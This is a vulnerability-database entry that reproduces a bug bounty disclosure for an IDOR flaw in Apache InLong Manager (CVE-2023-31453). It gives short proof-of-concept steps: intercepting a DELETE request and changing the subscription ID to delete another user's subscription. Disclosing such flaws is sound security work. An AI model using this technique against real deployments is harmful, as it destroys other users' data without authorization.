Lucene search
Lujiefsi19B6A951-138B-4F51-B81A-477852F855DEHistoryApr 17, 2023 - 10:55 a.m.
IDOR make users can delete others' subscription
2023-04-1710:55:11
lujiefsi
www.huntr.dev
7
idor
security vulnerability
unauthorized access
subscription
deletion
burpsuite
exploit
api
bug bounty
EPSS
0.002
Percentile
61.1%
Proof of Concept
1 user1 create subscription1
2 user2 create subscription2
3 user2 delete subscription2
4 user2 use burpsuite hiajck the request
5 the request URL can be DELETE /inlong/manager/api/consume/delete/2
6 change the request :DELETE /inlong/manager/api/consume/delete/1
1 is the id of subscription1. user2 is not the owner of subscription2.
7 result:
{“success”:true,“errMsg”:null,“data”:true}
Related
prion
prion
Design/Logic Flaw
2023-05-22 14:15:00
osv
osv
CVE-2023-31453
2023-05-22 14:15:09
cnvd
cnvd
Apache InLong Authorization Issues Vulnerability
2023-05-28 00:00:00
veracode
veracode
Incorrect Permission Assignment
2023-05-23 04:01:10
nvd
nvd
CVE-2023-31453
2023-05-22 14:15:09
cvelist
cvelist
github
github
cve
cve
CVE-2023-31453
2023-05-22 14:15:09